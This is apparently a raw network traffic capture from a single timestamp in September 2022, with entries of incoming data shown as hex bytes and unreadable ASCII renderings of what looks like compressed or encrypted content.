                                                                                                        2022-09-29 12:45:44 UTC4917INData Raw: e4 7d d1 01 6a 50 de 88 ab 4c 95 8e 37 8c 76 27 42 5b 8e 5c 16 5c 4b 2e 6d 16 a7 24 65 a1 e3 fa 54 27 02 ed 47 07 56 3c 9e a8 56 62 93 27 9b df ad 7f 23 81 23 67 5c b7 5c 83 3b d5 ef 8c 37 4c 51 bf 28 5b 66 14 f8 c2 24 3b 18 a3 7d d5 7a 14 8e 03 51 42 91 ac aa da 48 7b 29 e1 9b 4f c4 fc 85 03 5c ae f5 03 ff 04 b7 0b 6a c2 3e e1 d9 79 c0 35 9a 9c 2a 28 73 6e 7b 99 2d 06 d1 92 32 06 59 9b 2e 04 de 25 2b 51 da b9 4e 59 47 44 64 e3 7b 14 b1 0e 4e 27 a5 58 72 d1 2e 8d e1 a9 5f 32 f9 1e aa 2f 66 d6 19 68 44 f7 db 28 38 d2 5f 58 eb 8f ee 65 30 6b e1 fb d2 f1 cd c0 b1 c8 f8 10 1e 89 2d 2e 38 ad 83 cf 69 ba 1b ae 34 ff e0 56 e5 3c 12 cc b2 14 12 e2 e9 8b 61 00 32 de 9e 34 22 4a ac bf d9 94 84 e4 21 3e f0 1f d2 90 a3 da c8 d7 33 b5 5a 51 e0 d6 34 d5 6a 45 d4 d5 0a
                                                                                                        Data Ascii: }jPL7v'B[\\K.m$eT'GV<Vb'##g\\;7LQ([f$;}zQBH{)O\j>y5*(sn{-2Y.%+QNYGDd{N'Xr._2/fhD(8_Xe0k-.8i4V<a24"J!>3ZQ4jE
                                                                                                        2022-09-29 12:45:44 UTC4933INData Raw: 1d 46 a1 71 b0 93 7a 22 3a 23 80 55 95 e7 80 f4 e4 45 db 86 37 fd 93 da 16 42 e1 5a 70 32 6a 5b e8 d1 f5 84 4f b5 a7 3e b5 34 3e 92 bc c1 5d 21 01 99 65 6e 01 cc c0 16 fa fb 7c 1d ca 2e 68 78 f0 8a a1 60 0b 48 72 9e 0a 74 30 32 2e 17 bc e5 ad e7 86 41 aa 8e b8 66 8d 17 b1 9c b2 6b 32 55 91 3a 9b ea de dc 3c c7 75 0f 96 6e ea 09 4c 15 63 a1 e5 00 f0 6c 34 b6 a2 2f e5 01 1f 0a f8 22 8f 9f 0d 5b c5 8d f6 96 95 be 54 d0 75 9d a7 0e a4 98 18 87 18 41 30 04 c1 fe b2 10 c1 08 11 ed 4f 3b f2 2a 38 55 9f e7 1d 72 01 5a f0 00 f5 41 17 3d 46 75 61 9b 9d bb 8d fa 8f 06 ca 9a 58 2f cb 25 ca 7f bf 99 4d cf 4d 99 37 91 fc f0 b6 d1 74 0b ef e6 f7 b7 84 83 cc af f9 e3 b6 8a 07 94 c0 f6 16 c2 60 67 13 87 20 90 88 e6 da cf 4c f7 cb f6 70 f2 75 03 5d d0 2f ae 17 d2 55 01 55
                                                                                                        Data Ascii: Fqz":#UE7BZp2j[O>4>]!en|.hx`Hrt02.Afk2U:<unLcl4/"[TuA0O;*8UrZA=FuaX/%MM7t`g Lpu]/UU
                                                                                                        2022-09-29 12:45:44 UTC4949INData Raw: 0d ff e7 7e 75 38 d3 9d c3 e7 8f 2e 83 e4 2d 22 98 da db 7f c2 5b 38 16 10 1d 7d cf 13 2f 1f 15 ca b1 9b d4 6f b7 be 09 fb d8 bd 34 b9 21 53 ec 51 06 89 b0 1d 12 26 8a 33 4a dc e6 7e a2 80 b8 84 3e de 45 25 c3 e8 ba 69 87 8d 7e 83 55 e9 a1 c7 b7 0c 1a 11 61 06 79 7c 9f cd 25 c2 56 69 66 9a 8b e3 ab e1 da a2 3d f3 23 10 0d a8 fb f0 87 53 15 33 be 7c b6 d0 cc ef 32 ee 85 34 12 11 08 42 47 c9 21 0f af dc 76 f4 07 ab 9e 3f b1 60 6b 8f 7f 5c 70 94 bb ba 19 50 e4 da dc e8 5b f4 b5 e5 d1 c1 5b ab fe 1e b2 a6 ff 71 3b b6 19 6c fc 1c 95 c6 f4 68 75 f5 08 2f 38 01 13 38 37 ae dd 08 dc 05 30 40 f2 18 b6 4e 50 75 0f c3 23 0c 99 42 2b 8b bb 67 92 7b 26 f7 9e 26 aa 98 15 d4 55 73 2c 3d 76 08 bf 9a 67 c5 2e 9a b5 1d ea d6 a4 0a eb 32 62 5a af e3 38 ba 5f 75 b7 d2 74 d0
                                                                                                        Data Ascii: ~u8.-"[8}/o4!SQ&3J~>E%i~Uay|%Vif=#S3|24BG!v?`k\pP[[q;lhu/8870@NPu#B+g{&&Us,=vg.2bZ8_ut
                                                                                                        2022-09-29 12:45:44 UTC4965INData Raw: 28 e1 47 92 12 60 3e ea 09 63 53 58 e9 23 f8 c8 0b 83 e0 e3 49 1e 72 97 53 e9 54 40 d3 fc a9 6e 20 fd 44 69 44 51 b7 9d 07 88 7d b7 30 10 ec b3 fe f8 32 28 25 33 86 0e 46 b3 d2 11 93 2d ba 69 d0 5f bd 7a 46 0d 28 e0 76 89 fb 59 de f7 1d b1 09 5c 83 32 85 8c 8b 4b e9 b1 3c c1 5d aa 8f 1d af c0 de 62 80 8a cd 17 8c 25 e9 b0 32 33 b1 b5 1b bb 1d 7c 30 c1 2c ac 5e 78 f5 7e 37 0c 1c 98 ad d1 bb cc 90 7f 85 30 7f b1 45 f8 cc 76 6a 15 80 6f 43 e1 1b a2 ef e5 7f f8 d3 21 f1 2a ce f8 8e 10 af ae 5e e3 3c 5d 36 9a bf 1a 3a e4 61 4f 59 a8 5d 5e 73 30 d9 cb e0 59 92 55 50 cb 48 6a 6a c6 01 15 dd 44 87 bd ac 84 14 f3 f5 87 64 4e d4 8a 4b 9a b9 70 76 3a a4 d4 a7 84 33 f0 d1 e3 5f 28 88 0b 11 ca da 1a 7f 44 9a 09 e0 77 fe df 48 f0 8a 33 e3 7d c0 51 62 fb 65 8d b0 17 91
                                                                                                        Data Ascii: (G`>cSX#IrST@n DiDQ}02(%3F-i_zF(vY\2K<]b%23|0,^x~70EvjoC!*^<]6:aOY]^s0YUPHjjDdNKpv:3_(DwH3}Qbe
                                                                                                        2022-09-29 12:45:44 UTC4981INData Raw: 9a 4f 31 af d0 29 95 96 71 bc 1a ac 6e c3 39 eb 68 57 a8 6a f4 38 0f 31 8d 7d ab 94 0d 1c ee 47 9b 51 a8 0f 7f 89 32 d7 64 83 ac 9a c8 bf 42 d9 2a ec fc 25 9c 70 9c 71 d9 8b 11 bb 98 88 1f 78 40 d1 65 c7 de 8f e9 68 13 da 70 97 15 12 1b 3d dd 40 0b b8 b1 59 de b9 3b e7 8f 4c e4 2f 59 cf cf 14 4e 36 fb b9 1e 43 bf 69 de ca 19 3d 9c d3 b4 67 a3 8b 86 ed 58 8b 40 a3 a4 11 76 91 b2 19 01 48 fa 85 e2 8b 2b 69 56 c6 fc c9 56 7f eb 28 c5 a4 e0 1d 34 38 5f 08 34 7d f3 61 82 65 05 32 da cb 85 84 52 e2 63 c6 63 59 6d 5d 39 0c 2f 8e 6d f5 d3 6a c9 a3 bb e5 30 49 80 81 85 f2 65 e3 d3 80 27 5f 9a f9 01 1c 50 2b 77 31 99 66 58 6f f1 03 3a ce 68 28 86 b0 93 04 11 5c f8 07 92 f4 e2 2b a2 5e bd ee 08 c9 36 25 79 59 7c e3 6d c7 c6 2e cb b3 20 a0 6b 37 df 57 ed 20 eb 41 cd
                                                                                                        Data Ascii: O1)qn9hWj81}GQ2dB*%pqx@ehp=@Y;L/YN6Ci=gX@vH+iVV(48_4}ae2RccYm]9/mj0Ie'_P+w1fXo:h(\+^6%yY|m. k7W A
                                                                                                        2022-09-29 12:45:44 UTC4997INData Raw: 9e 4b 4f eb 58 0a 11 06 a1 31 93 4f 59 40 40 fb 88 90 ea 2f 75 2a 04 a3 7f 97 a1 17 17 15 b7 af 46 2f e7 9f 92 6b 47 da f0 11 d4 cb 50 93 0a b3 6c 1a 35 20 ea c1 af 23 d0 86 92 0c b8 87 19 ea 36 71 3c 0a be a1 ab 59 56 a4 6d 13 6a 1c 37 fd 5e f5 d4 16 73 e7 43 22 ac 63 c0 e9 33 dc e3 be e7 c1 ea 65 89 f4 06 d7 68 6e f2 72 61 8e 4b eb 51 74 fc 1c 2a c1 c9 96 7e 60 53 96 30 2c 12 c7 64 96 b5 a4 68 c9 d8 0b 67 72 42 f0 97 df 70 1f f0 2a 4d dc 49 da 8c 73 59 09 fe b8 c6 84 49 86 18 19 8c 81 f5 f6 97 d3 3d d1 ab f4 7c 27 2f c2 1c 0c 8f 90 86 71 40 3f 09 4a 65 77 70 48 35 69 cd c6 09 e7 18 67 e6 ce a5 aa 68 cf 57 dd 24 0f 9b 9c a5 19 98 2c b2 89 58 67 8c e2 b9 2c fe 36 33 5d 13 00 92 e7 75 11 d7 cb 18 cb f1 c8 93 92 3e cb e2 a2 ac 25 1f a1 51 8b 08 0d e1 40 52
                                                                                                        Data Ascii: KOX1OY@@/u*F/kGPl5 #6q<YVmj7^sC"c3ehnraKQt*~`S0,dhgrBp*MIsYI=|'/q@?JewpH5ighW$,Xg,63]u>%Q@R
                                                                                                        2022-09-29 12:45:44 UTC5013INData Raw: 21 47 e2 12 cc f1 05 a8 14 86 6f 8c a2 9c 32 7a 99 7e 51 87 64 e3 c6 1c bf 20 2c 98 f2 67 c5 15 85 6d f5 d4 45 80 18 cc 0f d0 81 d3 23 8e db 31 d3 81 8e 6d 51 f8 c0 65 f9 72 b1 7d 68 0d e4 74 7c a3 bb cd d1 93 1f c4 b6 e2 1e a3 fe b9 e4 e5 c3 a1 d8 d9 d5 29 35 a0 21 04 d6 1e fc 27 29 e3 a5 bb 00 5e 93 18 98 26 07 27 b1 42 c5 a4 23 49 ff 29 32 ab 9e ad 45 9b 16 b5 35 fb 9a c6 91 fd 32 d8 db c0 11 1f 66 c1 55 61 9e ee 2c 29 8a 96 c8 51 55 78 20 ee 24 c8 03 96 ef 8d f9 7e f2 08 0d 08 a4 e3 4c df d6 4e ed a7 7c d2 07 68 60 b9 55 f7 ab d5 8b 40 bb 63 7b e8 29 63 ef 4c 13 06 b7 81 60 db 58 08 9b 4a 4f f0 de 9a ba 76 ec e5 1a db 11 cd 30 45 ff 8d 86 41 f7 2f 85 db 1e f2 a1 15 9a 91 88 65 34 24 cf 4f 9b 1b 48 f2 ca ba 40 c0 df 69 c5 2c 5d 06 23 ee 69 b7 de 83 49
                                                                                                        Data Ascii: !Go2z~Qd ,gmE#1mQer}ht|)5!')^&'B#I)2E52fUa,)QUx $~LN|h`U@c{)cL`XJOv0EA/e4$OH@i,]#iI
                                                                                                        2022-09-29 12:45:44 UTC5029INData Raw: 50 e5 a1 bb 9f 8e 09 8d 2e 1d 57 2e 1d 8c 16 d2 e5 4d 74 38 da 1b 72 3a c6 c9 54 64 97 a6 58 c9 fc d1 65 a9 57 62 2d a0 f3 bb 0c 1b 8a bf ac d3 96 8c a2 41 dd 92 e8 82 d4 5b 80 5c 2d f6 9e 82 73 c3 40 14 02 85 a1 a9 5d b5 35 d5 24 f7 a7 47 3b 29 bc 8c ab 5b b7 2d ec 77 6f 4c 37 9d e3 23 db 5c 7a d3 0d 04 c7 32 bd e6 41 f2 ca 55 e7 73 6f 35 3f 9c f5 ee e7 b2 f7 e4 95 3a bc 7c d5 fe b6 23 ba 3b 22 ef c2 0a b5 66 c7 9c 1d 18 7b 61 4b ab da 77 83 4c c3 d4 b3 bf 26 ec 8f d8 d1 f1 53 12 d1 e6 03 76 0d ca eb 15 20 62 17 9e 3b 14 22 e7 bf 4f 02 b0 41 16 8e ca 91 25 c6 66 1d f2 87 5d 8f 92 a9 f0 67 56 ec 07 c5 d6 f0 74 0c 69 5a 81 b0 9b b3 75 fc 61 97 8b 44 5d 73 55 23 38 5f 43 3c ee 4d c2 5b bc 2e 30 8d c0 e0 f3 bb 93 71 19 74 c6 42 f9 aa 8c 6a bf 2e 4f d6 0d ec
                                                                                                        Data Ascii: P.W.Mt8r:TdXeWb-A[\-s@]5$G;)[-woL7#\z2AUso5?:|#;"f{aKwL&Sv b;"OA%f]gVtiZuaD]sU#8_C<M[.0qtBj.O
                                                                                                        2022-09-29 12:45:44 UTC5045INData Raw: cc 8d 27 8e fa 8a 64 2a dd d7 ba 28 89 86 0b ef 6d 77 6f 1b ec c9 f1 1a 54 73 ab 97 fa a9 04 64 33 2d 6b 07 74 2a e4 db 56 d6 a7 2e 0d ea ad d4 85 c7 35 4b 5b f5 90 03 57 4d 81 da 9e 96 12 85 47 e4 e0 0f 2a 20 81 d2 88 21 be 9f e7 16 ad 70 c4 c4 0c a3 d7 95 7f d9 c4 22 39 30 40 89 75 48 b2 42 cc de 42 b1 8e e5 4d b5 57 68 c9 cc 94 3a b1 bc c9 5d 03 84 cb c8 24 76 b7 2d 47 de 24 15 da e9 22 aa 4b 90 e6 38 19 9f 3a b6 0e 59 fb dd 3b 21 00 d8 27 46 c2 d9 db 42 5d 81 ad df d3 2b aa 54 f3 ac 4d da 4d 3f ab be 8e 64 fb aa 6c 43 af b1 18 47 50 72 97 e0 94 10 87 5a f4 17 a0 18 b0 22 02 48 65 d4 1d d8 d3 b5 cb 68 66 f7 e0 8f 4b af f8 d6 66 72 42 31 a8 08 90 60 5a 13 8f 7e ed 8a 2a 5a de a8 4f 28 9d a0 e6 7e 85 6c 3d cb 1d 80 46 9a dd bc d5 81 f3 37 c5 e2 8e 04 04
                                                                                                        Data Ascii: 'd*(mwoTsd3-kt*V.5K[WMG* !p"90@uHBBMWh:]$v-G$"K8:Y;!'FB]+TMM?dlCGPrZ"HehfKfrB1`Z~*ZO(~l=F7
                                                                                                        2022-09-29 12:45:44 UTC5051INData Raw: 12 9e 52 32 c7 de 31 78 f1 04 73 89 7c e1 58 30 f7 0b 04 1c 27 5d 09 5b 65 88 fc b0 b6 46 82 ba d2 a1 fe 61 cf df 87 79 25 69 45 36 c9 2d 64 2d 49 3d 8f 7f fa a5 90 b7 86 f9 1a 19 c5 6b 80 86 8f 6a 16 6d 63 1a af 4f dd 54 c7 1c af ad e4 19 ce b5 b4 0e d3 42 ed 31 ce f9 99 89 d7 55 93 2a 3e d2 4a ab e7 dc c2 e4 90 3e 1f 96 f7 30 25 93 36 39 69 28 7c 44 b6 79 08 20 28 4d 2a 56 ca 4a ab d5 ca aa d5 ab 93 ae ed ba 4b f9 d6 da 26 cc df 35 2b 8a be 66 92 64 7c 76 e2 e1 a7 fa 55 41 78 0c 08 77 7f 00 b5 b5 1c 4f d8 40 a4 a5 01 78 f5 da a2 37 3e c9 10 75 d7 06 a6 b7 48 a2 37 bb 77 aa b7 8c 3b 88 d5 87 8e 2d c4 d1 21 de bc 72 0b 3c c2 11 05 0b 5a 0f 6d e5 bf 75 55 de b0 72 76 45 02 da e7 18 46 9e 89 3e 22 ad 06 01 a1 02 50 d6 9c c5 69 d9 80 ac ad 9f da 0a c7 87 d1
                                                                                                        Data Ascii: R21xs|X0'][eFay%iE6-d-I=kjmcOTB1U*>J>0%69i(|Dy (M*VJK&5+fd|vUAxwO@x7>uH7w;-!r<ZmuUrvEF>"Pi
                                                                                                        2022-09-29 12:45:44 UTC5067INData Raw: f0 04 60 e3 f9 cf 14 e1 b8 cd b0 b8 36 2b 70 fe ab ee 68 f9 dd 15 28 5d fd 00 3a a6 e9 5f e6 e1 56 c6 1c 87 69 17 4d 1c 02 3e f6 10 4c f6 fd 3d a7 31 30 c2 12 f1 9d 5e 7a 7c 09 d5 b6 a1 dd 19 ce a4 0e c4 3b 8f 78 ce b8 4a 71 8f b6 ae 64 2b 80 b8 90 82 37 4c 16 9c 1e 3f 1b dc 91 c7 17 30 84 4f 90 a1 7b 1d d7 e9 0e 08 b2 35 dd 3f 4c 54 e3 b9 a8 ca fd dc a7 3c 22 ed 0e 75 87 4f 72 5f 5e e4 c9 53 5b 7b fb 16 16 04 64 ef a4 23 c1 b5 79 95 57 dc 78 9c d7 0f 7d b5 9d d2 ef bc 47 6d 4a 0d 2e f3 44 29 3f 6f f7 b9 a4 37 00 ba 25 b3 dd 78 87 63 4a 30 67 8d 52 2e 2c 34 37 d3 16 46 e6 14 8f c8 ef f0 43 47 30 bb be 93 0d ae ed 8e 77 fd 1c e6 8b a1 dc 9e 3f b8 d5 94 ae e4 71 c5 da a0 36 6c 3c 1b 6d 89 6f 3e 8d 06 9c 95 7f 4a 22 3a bb 70 0b 6d 4e ff 9c 13 ea 95 e8 aa 78
                                                                                                        Data Ascii: `6+ph(]:_ViM>L=10^z|;xJqd+7L?0O{5?LT<"uOr_^S[{d#yWx}GmJ.D)?o7%xcJ0gR.,47FCG0w?q6l<mo>J":pmNx
                                                                                                        2022-09-29 12:45:44 UTC5083INData Raw: b7 f3 7f c2 e3 49 e7 bb 2a 74 76 c8 85 b9 35 ca dc 0f 63 68 9d a4 09 24 7c 98 d2 6e bc 6c a6 ff e7 c5 c9 26 c7 68 60 a3 1d f4 85 f7 c0 59 1e 7f 75 44 1f f5 45 c9 be 00 0e 64 e9 59 28 a6 4c cc 9d 8e 69 cc d7 05 70 1d b0 ad 92 3d 07 e4 d0 65 a1 e1 54 72 7f f2 db cf e5 82 cf 8a fd b9 4f a8 f9 80 e4 50 5e 7a de 00 be d5 1d f6 a4 eb b2 5f 19 ba 60 be 45 83 e2 44 d1 18 7f 41 ab 79 25 e6 4d 26 8d d9 a7 36 42 67 45 85 01 c0 96 48 b6 e1 ac 6c c4 20 2f ef ef 5d 91 77 5f ff bb 1d 88 ba 13 c0 e1 d0 98 ef 8f 36 55 a4 6f b0 89 7c 50 c8 85 6b 2b 3d 86 a3 5a 70 26 8b a0 8c 24 98 00 91 a0 2c 33 29 ad 31 7d 5b 6b 36 f4 94 bd 2c ee f0 4a eb 03 0c 99 2a 58 22 ed fe a2 bf 1b 1e 79 2c c1 5c 53 a0 62 d9 34 0f 79 6c df f9 33 cd 18 90 81 72 1b 41 94 39 74 0e be 1a 7f 7d 07 14 2c
                                                                                                        Data Ascii: I*tv5ch$|nl&h`YuDEdY(Lip=eTrOP^z_`EDAy%M&6BgEHl /]w_6Uo|Pk+=Zp&$,3)1}[k6,J*X"y,\Sb4yl3rA9t},
                                                                                                        2022-09-29 12:45:44 UTC5099INData Raw: 70 76 9e 7a b6 45 61 b2 0f 18 f2 c5 1c e1 fa 74 b2 ae 88 9b c8 b9 f1 89 1c 80 4a 77 f8 f4 19 89 cf 30 f5 b4 d3 24 ec 44 6c 47 92 b4 2c fa 81 52 f8 19 58 0d 99 5f 74 d5 ff 6c d6 ad b2 a8 00 dd 39 32 62 da 72 e2 f4 56 c5 f4 81 66 3f b5 ec ac 19 cc 5d 7b c3 e3 c4 4d 7b 44 38 ed 1c 96 f6 dd ce 36 9d 34 e3 38 9f 4d 64 38 4a 8a c0 d2 d3 e4 cc 59 de fe df 00 65 8a 73 0b f8 3b 25 f7 09 83 5d a0 90 30 be 64 ba c8 a5 e1 a7 9f 1a fa 28 9e 4e e0 4f 07 ca 6c 4c de 76 f6 51 6b fc 66 b2 fd 39 5c bd 73 44 84 a2 0f ea 5c be e0 77 93 d1 5c 94 1f 91 76 d0 50 79 1a 05 8d 08 97 60 30 17 14 16 f0 ed f0 fc 28 46 83 5d f1 af a5 34 20 bd 4d 12 1e 33 e6 57 bf d8 c6 4d 90 a5 52 86 4b 73 c0 80 27 4d 9b 60 d8 b2 3c 3a d2 66 9c 6b 9d 73 48 74 fd 1b 09 5a a1 9a 68 60 2f 92 7e 12 a2 5c
                                                                                                        Data Ascii: pvzEatJw0$DlG,RX_tl92brVf?]{M{D8648Md8JYes;%]0d(NOlLvQkf9\sD\w\vPy`0(F]4 M3WMRKs'M`<:fksHtZh`/~\
                                                                                                        2022-09-29 12:45:44 UTC5115INData Raw: 93 ad e5 ee 9f 79 30 9d ab 41 3d 32 59 77 da 58 a9 b7 1f 79 03 d0 25 76 b8 b1 c3 72 91 b1 76 03 15 99 dd 69 2a c2 d2 fe 68 77 75 a4 1f 85 e3 77 ca f0 03 c1 89 c5 33 7f 9e be 15 0e a3 30 a3 55 f5 c1 1c 4c a9 41 18 14 d8 84 6a 63 ed e9 01 63 ef 80 57 4e 75 81 ec b1 41 f9 3a 5d 23 2c 65 ff 5c 0d a0 8d 98 4e 12 d7 64 c3 e2 a7 49 b2 8c a4 1b ed 34 57 ca b7 c2 eb 29 3a e1 4f 85 fa 5d 2e a1 32 7b 7f f1 d7 47 ee 89 92 b8 ab 73 35 8d 61 85 e4 0b 1c ec 2b a3 dd ab 77 a2 9a bd ed 28 75 95 c1 ef 7c fa 44 ef 00 da 52 6c b4 5c fb 82 94 21 76 0b 1d b2 11 5c 5d 82 64 94 28 f1 7d 9a 2f 43 18 f6 63 fd 66 36 af 71 66 cb e4 8b 09 de 71 93 b6 03 b7 e4 57 15 65 5a c4 4d b6 f8 e1 d7 55 d8 38 0c 84 75 e9 62 52 7d 07 ec aa 49 69 37 b7 e8 bb ca fc a7 83 62 6e 09 01 d5 31 05 91 25
                                                                                                        Data Ascii: y0A=2YwXy%vrvi*hwuw30ULAjccWNuA:]#,e\NdI4W):O].2{Gs5a+w(u|DRl\!v\]d(}/Ccf6qfqWeZMU8ubR}Ii7bn1%
                                                                                                        2022-09-29 12:45:44 UTC5131INData Raw: a7 07 8f c7 c3 5d 84 5c e4 03 8a 1f 42 b7 50 cb b2 bf 80 17 0c 97 58 ea 79 60 8f 23 4d 42 04 42 5f 10 31 7b b2 37 6e a0 06 b7 85 e0 8f 93 77 4d 74 09 17 1a 17 10 9a be d6 b0 75 b0 13 a8 5c 1d 9f 4b 77 3b ba 8b bd 6a 69 5b e8 87 98 3c ab 2d 6c 03 51 6f ee 59 a0 54 3e d5 82 1d ea a0 97 47 c0 6c ac 59 89 89 a5 da b6 59 a6 83 21 1c d6 f3 53 ca 20 44 9a 3c 42 53 d5 87 fa 80 fa 03 e7 b5 7a 72 a1 bf 54 96 d4 d0 df 56 87 89 b5 9c 84 06 50 ad 37 1c 03 0a ce a5 d7 a9 3b 56 61 fc 83 0b b2 d9 14 a4 3d b2 fb 9e 2b c1 f8 87 2b 2a 74 5e eb 60 ce 30 74 4a 48 df c0 c2 87 5c 29 e7 2a 2b f4 a9 0b 79 45 76 75 e8 da 31 fe 45 67 fb da a0 3b 71 c7 00 de ab d9 ed 90 0d 36 53 b4 c9 b3 ec f7 92 b1 af b1 38 09 7a ca b9 23 5d a7 2c 4a b1 b7 61 bb 20 a1 0c 27 5e 6d 7e 33 48 71 4b 7a
                                                                                                        Data Ascii: ]\BPXy`#MBB_1{7nwMtu\Kw;ji[<-lQoYT>GlYY!S D<BSzrTVP7;Va=++*t^`0tJH\)*+yEvu1Eg;q6S8z#],Ja '^m~3HqKz
                                                                                                        2022-09-29 12:45:44 UTC5147INData Raw: be ad 2d c7 1c 62 48 f3 2d f1 10 c2 11 4c 4f 34 e3 00 f4 e2 f0 8c 3b e2 f3 ca d3 2e b9 62 27 09 37 c2 be a7 44 4b ee 3a b5 73 90 8e 8c 8a 0f 4f a1 a6 d3 ac 48 74 5c 6f b0 7e 17 4b a9 26 9c 23 a7 4d 5f 58 ff 3c bb 21 e7 c4 8f 5b a1 ab 37 ad 80 ed e2 65 71 01 d7 ca 92 94 f7 e7 a6 52 83 15 b1 b8 72 1c bf 42 a0 95 81 c4 c3 fb 6a 04 cb 5d 7d 4e 4c aa 57 7d d6 0e dc 5a 50 59 f8 f7 93 11 4d 6c 6f f5 d8 d2 a2 83 53 f0 a2 6f 3a e0 f2 8f 41 b3 3d 09 38 c4 c1 a5 28 c6 18 3f f1 db 40 f8 61 ff 25 82 3d 08 96 6b 1b be 27 a0 bb be 92 46 0b 3e 03 07 b7 0d 46 c9 64 c0 bf 48 9f 62 4d 4b 56 ee 2f e9 1b a3 9c 4d 7e ff 58 cc 48 f7 93 fd 2e 56 e2 4e 47 03 33 f9 d3 1a 46 9c e4 c0 9b c2 ba 20 03 2a 2d 0e a1 55 8a de 7e 43 6a 4c 62 8c 77 30 2e f4 de 78 f4 b4 d6 47 6f 63 23 05 f9
                                                                                                        Data Ascii: -bH-LO4;.b'7DK:sOHt\o~K&#M_X<![7eqRrBj]}NLW}ZPYMloSo:A=8(?@a%=k'F>FdHbMKV/M~XH.VNG3F *-U~CjLbw0.xGoc#
                                                                                                        2022-09-29 12:45:44 UTC5163INData Raw: 41 39 0b 24 69 74 59 3a a1 f2 32 eb a0 c2 46 03 36 af 3d 0b c5 f5 5f aa 3a 87 a2 1c 28 9c 19 24 31 88 2a a8 a4 24 a4 34 e4 cc 29 dc e7 d5 a4 41 f5 e3 6a 52 b6 82 4f 77 fd e8 13 87 7e 05 32 c9 e9 c9 15 c5 cc 70 d4 50 45 ee 32 6a 65 ad f1 7b 94 02 09 a0 92 fb 31 15 49 c1 8b e9 49 05 16 cd 68 7a fe ba b2 4e 82 18 fb 08 9f fd 16 30 36 c0 f8 2e df b9 5a 1a 8b 0e 15 2a 12 da 1f 9f bc 86 33 a0 8c 8b 2d 6d 36 ff 09 bf 9b c0 28 89 d0 50 bd e2 7a 04 98 24 ef 53 0d 57 78 a7 8d cf 86 09 15 9b 35 ea a7 6d 05 36 58 f5 98 83 6c 29 f5 7c b9 1a 3c 6a b9 a6 f1 3e 3c ae 1f 1d 14 5d 36 05 cd fd 31 7a 08 85 d5 85 7a 5a 83 e3 79 f0 ac 24 c4 93 0a 49 4b 30 59 46 38 74 2a ba b1 9a a6 39 7d d5 f3 fd a0 ed 44 f6 47 80 66 67 46 75 5c 71 d5 03 35 dd 67 fc b3 13 b3 5c ef 2a 21 95 52
                                                                                                        Data Ascii: A9$itY:2F6=_:($1*$4)AjROw~2pPE2je{1IIhzN06.Z*3-m6(Pz$SWx5m6Xl)|<j><]61zzZy$IK0YF8t*9}DGfgFu\q5g\*!R
                                                                                                        2022-09-29 12:45:44 UTC5179INData Raw: b6 a3 ff a9 2b db 59 f1 e6 91 97 0c d2 8f f7 09 4f 3a 6a 21 22 7d 5f 7e 54 cb 8b 95 92 81 4a 97 06 f5 5e 8d e3 46 8d 9c b0 d7 ce 9d dd 33 98 31 db 0e d2 f4 a6 88 fc 06 5a 8c b1 95 f3 54 79 5e ce f7 66 8c 3f 1f 13 1c 66 23 23 cc 5c 07 8d 6b cc e0 29 46 c1 24 fe 3d 20 c1 f1 8c e1 98 a8 f7 67 d0 42 51 34 07 24 30 a2 12 71 ee d9 e9 8b ed ee d6 c0 14 13 18 fc ad 6e 81 70 0e 2f 9a ca c1 cf bb 30 f6 2b 58 15 f0 76 13 ae aa d6 22 7b 80 04 bb 06 1c 2b d5 90 f6 97 6b 3d 39 7f c6 61 11 e5 6b 18 21 a6 31 46 b8 72 13 09 75 83 b7 9e bf cc 75 78 8e 76 b4 f0 71 cc 63 8a 65 7f 35 2a 2d 7d 02 cc d7 27 74 27 86 b9 bf 1b 0b 0b 11 9f 59 ff 2d 54 dc 72 d2 1a 72 57 56 f6 9e b7 c3 3a cc ba 7e 02 58 74 f6 5e 53 81 aa f6 48 9d 6f 5d 5b b5 dd 7d 0b f4 ee 7a 20 fe e9 72 70 87 3a e7
                                                                                                        Data Ascii: +YO:j!"}_~TJ^F31ZTy^f?f##\k)F$= gBQ4$0qnp/0+Xv"{+k=9ak!1Fruuxvqce5*-}'t'Y-TrrWV:~Xt^SHo][}z rp:
                                                                                                        2022-09-29 12:45:44 UTC5195INData Raw: 18 7e 23 24 cd f5 cd 50 cb a6 b2 84 56 9b f7 c4 48 61 b4 8c 18 b0 c3 c5 82 72 c6 5d 61 d5 cb c5 ce 1f 47 80 9a f6 94 58 d6 4c 27 63 9b fb 66 01 1c a2 4b eb dd f8 b5 fa 85 0d cf 09 b0 22 d2 d5 36 0f 09 bd ed 01 ff 2c 69 2c 5b 67 89 f5 f1 8b bc 9e 20 2b df 46 60 fa 0a a6 cd 4c b6 da cb 39 14 ea f8 33 be ec 0e f8 d5 99 e8 a4 b6 b1 66 ad 61 d1 47 2f d8 69 1d 66 d9 59 5f a9 eb a3 05 c0 11 6c 49 8a 6c a8 da 0f 44 8a 6a 3e 0b 57 f6 ac 4d 98 56 3c 83 c3 df 2d fa 82 ae fe c6 a4 be 56 de 55 7e 13 d4 07 4e c8 56 42 58 78 14 a2 e7 f4 68 5c 02 ae ad 70 8e f4 97 d3 4f 47 c8 26 ac 34 9a 39 1f 22 57 b8 f8 3c 72 b3 1c ad 4f 68 33 1c 15 03 66 67 d4 85 63 d8 8a 10 19 bd 7c ac 93 a1 97 05 5f 6f a8 7b 74 cc fd 46 92 06 83 8c e1 37 d5 db b3 c1 1f fd 55 c2 db ca 55 03 ef 85 ed
                                                                                                        Data Ascii: ~#$PVHar]aGXL'cfK"6,i,[g +F`L93faG/ifY_lIlDj>WMV<-VU~NVBXxh\pOG&49"W<rOh3fgc|_o{tF7UU
                                                                                                        2022-09-29 12:45:44 UTC5211INData Raw: 5f b8 e3 51 4e 85 92 cb a0 40 b7 81 10 ac a1 75 71 96 7d e0 80 58 f6 20 2c f3 d0 16 73 3f 32 9b 1a e9 aa 82 94 1c e3 3c 4b 83 01 88 af 64 d9 39 4f 0e 65 3e 64 eb aa 91 e4 14 dd 7c 4d 1e f3 77 20 38 d6 78 25 3d f3 3a 34 7d 35 4c 93 50 66 79 23 33 5f 43 f6 33 5b 87 98 2f 2d 2e ac 3b 8d 54 ab 43 53 5e 1b 88 c2 d0 e6 25 15 6a 16 14 4b 72 fb a7 ad 1c d5 85 5d a3 dc cc ea 12 5d af c3 78 12 0f 63 f9 d7 54 46 36 62 52 9b 87 89 1c f2 4f 14 62 32 0a 12 6d 38 28 76 7b 48 73 7d 25 77 ec 56 d5 09 b2 b6 20 ee b2 82 c2 af 22 35 ac 29 97 76 8d 2a 99 e4 54 d9 bb 95 8f 5c 15 d4 09 f2 d7 0f a2 40 0d 5e ca c2 59 e3 a0 a4 30 